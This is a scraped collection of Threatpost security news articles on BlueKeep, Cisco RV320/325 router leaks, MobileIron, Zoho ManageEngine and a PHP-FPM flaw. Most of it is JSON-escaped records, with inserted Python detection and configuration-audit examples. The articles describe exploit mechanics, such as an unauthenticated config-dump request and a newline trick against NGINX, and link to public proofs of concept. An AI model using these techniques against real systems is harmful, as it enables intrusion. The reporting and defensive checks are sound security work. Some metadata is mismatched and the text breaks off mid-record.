The BlueKeep vulnerability (CVE-2019-0708) is an RCE flaw in Remote Desktop Services that impacts older versions of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it’s wormable – and so it can self-propagate from machine to machine, setting the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).

The concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.

The new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Zǝɹosum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.

The National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.

“It is likely only a matter of time before remote exploitation code is widely available for this vulnerability,” the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. “NSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.”

The danger isn’t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.

To boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there’s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And, the NSA in its advisory warned that the number could actually be in the multimillions.

Some are finding patching to be an onerous process given that many older machines are in production environments where the required reboot – taking mission-critical systems offline – just isn’t feasible.

> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and ……..
>
> — Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)

Nonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.

“It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,” Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). “This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.”

_Source: [BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>), Threatpost, June 5, 2019._

UPDATE

Malicious scanning activity targeting Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers is underway, with a swell of opportunistic probes looking for vulnerable devices ramping up since Friday.

According to Bad Packets Report’s honeypot data, cyberattackers are targeting a
pair of just-patched vulnerabilities that allow remote unauthenticated information disclosure ([CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) leading to remote code-execution (CVE-2019-1652) on the routers. There are more than 9,000 routers open to the attack, the firm found.\n\nThe first vulnerability exists in the web-based management interface for RV320/RV325; a simple GET request for /cgi-bin/config.exp returns full details of the device\u2019s configuration settings, including administrator credentials (the password is hashed though).\n\n\u201c[This] could allow an unauthenticated, remote attacker to retrieve sensitive configuration information,\u201d explained researcher Troy Mursch, in [an advisory](<https://badpackets.net/over-9000-cisco-rv320-rv325-routers-vulnerable-to-cve-2019-1653/>) published over the weekend. \u201cAll configuration details of the RV320/RV325 router are exposed by this vulnerability.\u201d\n\nBad Packets Report\u2019s own scanning efforts [using BinaryEdge](<https://www.binaryedge.io/>), which canvassed 15,309 unique IPv4 hosts, determined that 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653: Broken down, it works out to 6,247 vulnerable out of 9,852 Cisco RV320 routers scanned; and 3,410 vulnerable out of 5,457 Cisco RV325 routers scanned.\n\nThese are mostly located in the United States, Mursch said, though overall, vulnerable devices were found in 122 countries and on the networks of 1,619 different ISPs \u2013 making for a significant, global attack surface.\n\nOnce a malefactor has gained admin credentials, he or she can further exploit the router after signing in. The CVE-2019-1652 flaw allows an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. 
The vulnerability is due to improper validation of user-supplied input.\n\n\u201cAn attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device,\u201d according to Cisco\u2019s [documentation](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652>). \u201cA successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root.\u201d\n\nA [proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) for remote code-execution has been detailed by researcher/grey hat David Davidson, but Mursch noted that there are mitigating circumstances.\n\n\u201cIn regards to how the routers are going to be exploited once compromised, it\u2019s not fully known yet,\u201d he told Threatpost. \u201cAt this point, I can only confirm threat actors are only taking inventory of vulnerable devices by scraping the leaked configuration files and credentials. The actual damage may be limited due to the capabilities (or lack thereof) noted by David Davidson. Only time will tell.\u201d\n\nDavidson\u2019s tweet explained:\n\n> yeah basically anyone unpatched is probably fucked. except for the fact the 'wget' on these boxes is broken half the time and its probably beyond your average skid to cross compile their mirai bot for the correct mips64rev2 shit (for now)\n> \n> \u2014 some person (@info_dox) [January 26, 2019](<https://twitter.com/info_dox/status/1089002947076333570?ref_src=twsrc%5Etfw>)\n\nOne interesting point to note is that the vulnerability also results in the SSID being leaked.\n\n\u201cThis allows attackers to use services such as WiGLE to determine the physical location of the router,\u201d Mursch told Threatpost.\n\nThis was also the case in the recent [Orange Livebox vulnerability](<https://threatpost.com/19k-orange-livebox-modems-open-to-attack/140376/>), Mursch pointed out. 
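A detection check for the activity Bad Packets describes, added here as an example; it is not Cisco's, Bad Packets' or the article's code. It takes HTTP access-style records (constructed below in a made-up `src method path status` format, e.g. from a honeypot or a reverse proxy in front of the management interface) and flags any source that fetched /cgi-bin/config.exp, escalating when the dump was actually served and again when the same source then POSTs to the management CGI, the shape a follow-on CVE-2019-1652 attempt would take. The /cgi-bin/ prefix used for the POST check and the severity ladder are assumptions of the example.

```python
# Added example: flag CVE-2019-1653 config-dump probes, confirmed leaks and
# follow-on POSTs to the management interface in HTTP access records.
# Not vendor code; the record format and the /cgi-bin/ POST prefix are assumptions.
from collections import defaultdict

CONFIG_DUMP_PATH = '/cgi-bin/config.exp'   # unauthenticated config dump (CVE-2019-1653)
MGMT_POST_PREFIX = '/cgi-bin/'             # assumption: where management POSTs land

# Constructed sample records: '<src> <method> <path> <status>', one request per line.
SAMPLE_LOG = '''
198.51.100.7 GET /cgi-bin/config.exp 200
198.51.100.7 POST /cgi-bin/ 200
203.0.113.9 GET /cgi-bin/config.exp 403
192.0.2.5 GET / 200
192.0.2.5 POST /cgi-bin/ 200
'''

def parse(line):
    '''Split one constructed record into (src, method, path, status).'''
    src, method, path, status = line.split()
    return src, method, path, int(status)

def analyse(log_text):
    '''Return {src_ip: sorted tags} for sources touching the config-dump endpoint.

    - 'probe':           the source requested the config dump (any status).
    - 'leak':            the dump was served (HTTP 200): credentials left the device.
    - 'post_after_leak': the same source later POSTed to the management CGI, which
                         is how a CVE-2019-1652 command injection would be delivered.
    '''
    findings = defaultdict(set)
    leaked = set()
    for raw in log_text.strip().splitlines():
        src, method, path, status = parse(raw)
        if method == 'GET' and path.split('?')[0] == CONFIG_DUMP_PATH:
            findings[src].add('probe')
            if status == 200:
                findings[src].add('leak')
                leaked.add(src)
        elif method == 'POST' and path.startswith(MGMT_POST_PREFIX) and src in leaked:
            findings[src].add('post_after_leak')
    return {src: sorted(tags) for src, tags in findings.items()}

def severity(tags):
    '''Map a tag set to a triage level (the ladder itself is an assumption).'''
    if 'post_after_leak' in tags:
        return 'critical'
    if 'leak' in tags:
        return 'high'
    if 'probe' in tags:
        return 'medium'
    return 'info'

if __name__ == '__main__':
    for src, tags in analyse(SAMPLE_LOG).items():
        print(src, severity(tags), tags)
```

A 200 on config.exp is itself the incident, not just a probe: the configuration, including the hashed admin password and the SSID, has already left the device, so the response is to patch and then rotate the admin and WiFi credentials rather than to wait for a POST to follow.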
A leaked SSID means that an attacker can mount a variety of on-location proximity hacks, and it also allows easier botnet-building given that many admins use the same credentials for the administrative panel as well as the WiFi network \u2014 opening the door to more devices to enslave.\n\nThe vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 1.4.2.15 and 1.4.2.17. Cisco\u2019s patch should be applied immediately, and administrators should change their devices\u2019 admin and WiFi credentials, since a configuration leaked before patching already contains them, to thwart any compromise that may have already occurred.\n\n_This post was updated at 6:13 p.m. ET on Jan. 28, with comments from Mursch._\n", "cvss3": {}, "published": "2019-01-28T16:04:07", "type": "threatpost", "title": "Active Scans Target Vulnerable Cisco Routers for Remote Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-01-28T16:04:07", "id": "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "href": "https://threatpost.com/scans-cisco-routers-code-execution/141218/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-26T03:52:19", "description": "Advanced persistent threat (APT) groups are actively exploiting a vulnerability in mobile device management security solutions from MobileIron, a new advisory warns.\n\nThe issue in question (CVE-2020-15505) is a remote code-execution flaw. It ranks 9.8 out of 10 on the CVSS severity scale, making it critical. The flaw was patched back in June; however, a proof-of-concept (PoC) [exploit became available](<https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505>) in September. 
Since then, both hostile state actors and cybercriminals have attempted to exploit the flaw in the U.K., according to a new advisory by the National Cyber Security Centre (NCSC).\n\n\u201cThese actors typically scan victim networks to identify vulnerabilities, including CVE-2020-15505, to be used during targeting,\u201d said the NCSC [in an advisory this week](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>). \u201cIn some cases, when the latest updates are not installed, they have successfully compromised systems.\u201d\n\nThe NCSC said that the healthcare, local government, logistics and legal sectors have all been targeted \u2013 but others could also be affected.\n\nSeparately, the Cybersecurity and Infrastructure Security Agency (CISA) [in October warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) APT groups are exploiting the MobileIron flaw in combination with the severe Microsoft Windows [Netlogon/Zerologon vulnerability](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) (CVE-2020-1472).\n\n## **The Flaw**\n\nThe flaw, first reported to MobileIron by Orange Tsai from DEVCORE, could allow an unauthenticated, remote attacker to execute arbitrary code.\n\nMobileIron provides a platform that allows enterprises to manage end-user mobile devices across the company. The flaw exists across various components of this platform: in MobileIron Core, a component of the MobileIron platform that serves as the administrative console; and in MobileIron Connector, a component that adds real-time connectivity to the backend. 
Also impacted is Sentry, an in-line gateway that manages, encrypts and secures traffic between mobile devices and back-end enterprise systems; and Monitor and Reporting Database, which provides comprehensive performance management functionality.\n\nThe bug affects Core and Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier. In each case the flaw allows remote attackers to execute arbitrary code via unspecified vectors.\n\n## **Patches**\n\nMobileIron, for its part, said in an update this week that it has been engaging in \u201cproactive outreach to help customers secure their systems,\u201d and estimates that 90 to 95 percent of all devices are now managed on patched/updated versions of software.\n\nWhile the company said it will continue to follow up with the remaining customers where it can determine that they have not yet patched affected products, it strongly urges companies to make sure they are updated.\n\n\u201cMobileIron strongly recommends that customers apply these patches and any security updates as soon as possible,\u201d said the company in its [security update.](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\nThreatpost has reached out to MobileIron for further comment.\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _****_[FREE Threatpost webinar](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ on _****_Dec. 16 at 2 p.m. ET. _****_Find out what\u2019s coming in the ransomware world and how to fight back. 
_**\n\n**_Get the latest from world-class security experts on new kinds of attacks, the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _****_[Register here](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ for the Wed., Dec. 16 for this _****_LIVE webinar_****_._**\n", "cvss3": {}, "published": "2020-11-25T16:55:48", "type": "threatpost", "title": "Critical MobileIron RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-15505"], "modified": "2020-11-25T16:55:48", "id": "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "href": "https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:24:12", "description": "As the 2020 presidential election draws closer and primary season looms around the corner, Microsoft has launched a bug-bounty program specifically aimed at its ElectionGuard product, which the software giant has positioned as performing \u201cend-to-end verification of elections.\u201d\n\nElectionGuard is a free open-source software development kit that secures the results of elections and makes those results securely available to approved third-party organizations for validation; it also allows individual voters to confirm that their votes were correctly counted.\n\nThe bounty program invites security researchers (\u201cwhether full-time cybersecurity professionals, part-time hobbyists or students\u201d) to probe ElectionGuard for high-impact vulnerabilities and share them with Microsoft under Coordinated Vulnerability Disclosure (CVD). 
Eligible submissions with a \u201cclear, concise proof of concept\u201d (PoC) are eligible for awards ranging from $500 to $15,000 depending on the severity of the bug found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn-scope products include the ElectionGuard specification and documentation (such as data-transmission issues like information leakage); the verifier reference implementation (bugs that allow attackers to say elections are valid when they aren\u2019t); and C Cryptography implementations (such as bugs that allow key or vote discovery by observing SDK messages).\n\nThe program is one prong of the company\u2019s wider \u201cDefending Democracy\u201d program, under which Microsoft has pledged to [protect campaigns from hacking](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>); increase political [advertising transparency](<https://threatpost.com/google-fine-privacy-gdpr/141055/>) online; explore ways to [protect electoral processes](<https://threatpost.com/voting-machines-hacked-with-ease-at-def-con/127101/>) with technology; and defend against [disinformation campaigns](<https://threatpost.com/twitter-5000-accounts-disinformation-campaigns/145764/>).\n\nResearchers said that the bug-bounty program is a welcome \u2013 if limited \u2013 addition to the private sector\u2019s response to election meddling. However, they also highlighted the need for a more holistic effort, united across both public and private organizations.\n\n\u201c[Russian interference in the 2016 election](<https://threatpost.com/justice-department-indicts-12-russian-nationals-tied-to-2016-election-hacking/133978/>) gave cybersecurity a quick moment in the political spotlight,\u201d Monique Becenti, product and channel specialist at SiteLock, told Threatpost. \u201cBut when the cost of cybercrime reaches billions of dollars each year, election security needs to be top of mind for our political leaders. 
Since 2016, election security bills have been slow-moving. Some companies, like Microsoft, are rallying the security industry to address this issue head-on. The ElectionGuard Bounty program is an important step in the right direction, but we need political leaders who will champion this issue and ensure constituents and our elections stay secure.\u201d\n\nNot everyone is excited about the move; Richard Gold, head of security engineering at Digital Shadows, said that the program is limited to Microsoft\u2019s proprietary solution, which makes its real-world impact limited at best.\n\n\u201cIt\u2019s great that companies like Microsoft are launching programs like this, but the question remains: how much is this kind of bug bounty going to be used?\u201d he told Threatpost. \u201cBug-bounty programs need to be applied consistently in order to have real impact. There is a trade off in time and resources that needs to be overcome in order for a program like this to be worthwhile.\u201d\n\n\u201cMicrosoft is committed to strengthening our partnership with the security research community as well as pursuing new areas for security improvement in emerging technology,\u201d said Jarek Stanley, senior program manager at the Microsoft Security Response Center, in [announcing the program](<https://msrc-blog.microsoft.com/2019/10/18/introducing-the-electionguard-bounty-program/>). \u201cWe look forward to sharing more bounty updates and improvements in the coming months.\u201d\n\nMicrosoft paid $4.4 million in bounty rewards between July 1, 2018 and June 30 across 11 bounty programs, with a top award of $200,000.\n\n**_What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 
23 will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-18T20:04:29", "type": "threatpost", "title": "Microsoft Tackles Election Security with Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-18T20:04:29", "id": "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "href": "https://threatpost.com/microsoft-election-security-bug-bounties/149347/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. 
Steven Seeley of Source Incite [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter on Thursday, along with a proof-of-concept (PoC) exploit. According to ZDNet, Zoho will release a patch for the flaw on Friday.\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within Desktop Central\u2019s FileStorage class, which is used to read data from and write data to a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost that an attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. 
Nate Warfield, a security researcher with Microsoft, pointed to [at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However, Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. 
Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. 
Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. 
[Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:57:01", "description": "A buffer underflow bug in PHP could allow remote code-execution (RCE) on targeted NGINX servers.\n\nFirst discovered during a hCorem Capture the Flag competition in September, the bug (CVE-2019-11043) is in PHP-FPM, the FastCGI process manager that some PHP deployments run behind NGINX, and is reachable through the server\u2019s FastCGI configuration, according to researchers at Wallarm.\n\nPHP powers about 30 percent of modern websites, including popular web platforms like WordPress and Drupal \u2013 but NGINX servers are only vulnerable if they have PHP-FPM enabled (a non-default optimization feature that allows servers to execute scripts faster). The issue [is patched](<https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest>) in PHP versions 7.3.11, 7.2.24 and 7.1.33, which were released last week.\n\nIn a [Monday posting](<https://github.com/search?q=fastcgi_split_path&type=Code>), Wallarm researchers said that the bug can be exploited by sending specially crafted requests to a server whose NGINX configuration uses the \u201cfastcgi_split_path_info\u201d directive. That directive operates on user-controlled data, the request URL, splitting it into a script name and a PATH_INFO value that are handed to PHP-FPM. 
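The configuration pattern the article is describing, shown as an added example (not Wallarm's code, nor the article's): a minimal audit that walks an NGINX config, finds location blocks that both use fastcgi_split_path_info and hand requests to PHP-FPM, and reports them unless they first reject requests for scripts that do not exist on disk. Treating `try_files $uri =404` (or an `if (!-f ...) { return 404; }` block) as the guard that stops the newline trick is this example's assumption, the commonly recommended workaround rather than something the article states; both sample configurations are constructed.

```python
# Added example: audit NGINX configs for the CVE-2019-11043 exposure pattern.
# Not Wallarm's or the article's code. The guard it looks for (try_files $uri =404
# or an if (!-f ...) block in the same location) is an assumption of the example.

# Constructed sample: the exposed shape (regex split + pass to PHP-FPM, no guard).
VULNERABLE_CONF = '''
server {
    listen 80;
    root /var/www/html;
    location ~ .php(/|$) {
        fastcgi_split_path_info ^(.+?.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        include fastcgi_params;
    }
}
'''

# Constructed sample: same location, but non-existent scripts never reach PHP-FPM.
HARDENED_CONF = '''
server {
    listen 80;
    root /var/www/html;
    location ~ .php(/|$) {
        fastcgi_split_path_info ^(.+?.php)(/.*)$;
        # reject requests for scripts that do not exist before they reach PHP-FPM
        try_files $uri =404;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        include fastcgi_params;
    }
}
'''

def parse_blocks(conf_text):
    '''Minimal NGINX config walker (one directive or brace per line).

    Returns a list of (block_name, directives); directives is a list of
    (name, args) for lines directly inside that block. A nested block is
    recorded in its parent as ('block', nested_block_name).
    '''
    stack = []
    blocks = []
    for raw in conf_text.splitlines():
        line = raw.split('#')[0].strip()      # drop comments and whitespace
        if not line:
            continue
        if line.endswith('{'):
            stack.append((line[:-1].strip(), []))
        elif line == '}':
            if stack:
                name, directives = stack.pop()
                blocks.append((name, directives))
                if stack:
                    stack[-1][1].append(('block', name))
        elif line.endswith(';'):
            name, _, args = line[:-1].partition(' ')
            if stack:
                stack[-1][1].append((name, args.strip()))
    return blocks

def audit(conf_text):
    '''List (location, verdict) for every location that splits PATH_INFO and
    passes to FastCGI; verdict is 'guarded' or 'vulnerable'.'''
    results = []
    for name, directives in parse_blocks(conf_text):
        if not name.startswith('location'):
            continue
        names = [d for d, _ in directives]
        if 'fastcgi_split_path_info' not in names or 'fastcgi_pass' not in names:
            continue
        guarded = any(
            (d == 'try_files' and a.split()[:2] == ['$uri', '=404'])
            or (d == 'block' and a.startswith('if (!-f'))
            for d, a in directives)
        results.append((name, 'guarded' if guarded else 'vulnerable'))
    return results

if __name__ == '__main__':
    print('vulnerable sample:', audit(VULNERABLE_CONF))
    print('hardened sample:  ', audit(HARDENED_CONF))
```

The guard matters because the exploit needs NGINX to forward a request for a path that PHP-FPM then mis-splits; refusing requests whose script does not exist on disk removes that forwarding step. The walker is deliberately simple (one directive per line, no `include` expansion), so treat a clean result on a real config as a prompt to check included files by hand, not as proof of safety; patching PHP remains the fix.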
If an attacker sends a URL containing an encoded newline (\u201c%0a\u201d), the regular expression in fastcgi_split_path_info fails to match, NGINX hands PHP-FPM an empty PATH_INFO, and PHP-FPM\u2019s handling of that empty value underflows a buffer (the env_path_info underflow named in the patch). The attacker can then inject FastCGI variables of their choosing into the request.\n\n\u201cIn particular, [the bug can be exploited] in a fastcgi_split_path directive and a regexp trick with newlines,\u201d according to Wallarm security researcher Andrew Danau, who found the bug. \u201cBecause of %0a character, NGINX will set an empty value to this variable, and fastcgi+PHP will not expect this\u2026.[as a result], it\u2019s possible to put [in] arbitrary FastCGI variables, like PHP_VALUE.\u201d\n\nAnother security researcher participating in the CTF exercise, Emil Lerner, offered more details in the [PHP bug tracker](<https://bugs.php.net/bug.php?id=78599>): \u201cThe regexp in `fastcgi_split_path_info` directive can be broken using the newline character (in encoded form, %0a). Broken regexp leads to empty PATH_INFO, which triggers the bug,\u201d he said.\n\nLerner [posted a zero-day proof-of-concept](<https://github.com/neex/phuip-fpizdam/>) exploit for the flaw that achieves code execution on PHP 7. The exploit makes use of an optimization used for storing FastCGI variables, _fcgi_data_seg.\n\n\u201cUsually, that sort of [buffer underflow] response is related to memory-corruption attacks and we expected to see an attack on the type of information disclosure,\u201d Wallarm researchers said. \u201cInformation disclosure is bad enough as it can result in leaking sensitive or financial data. 
Even worse, from time to time, although quite rarely, such behavior can indicate a remote code-execution vulnerability.\u201d\n\nResearchers added that without patching, this issue can be a dangerous entry point into web applications given the trivial nature of mounting an exploit.\n\nAdmins can identify FastCGI directives of interest in their NGINX configurations with a bash command, `egrep -Rin --color 'fastcgi_split_path' /etc/nginx/`, according to Wallarm. A hit only shows where the directive is used; confirming exposure still means checking that the location actually passes requests to PHP-FPM.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-28T16:18:11", "type": "threatpost", "title": "PHP Bug Allows Remote Code-Execution on NGINX Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11043", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-28T16:18:11", "id": "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "href": 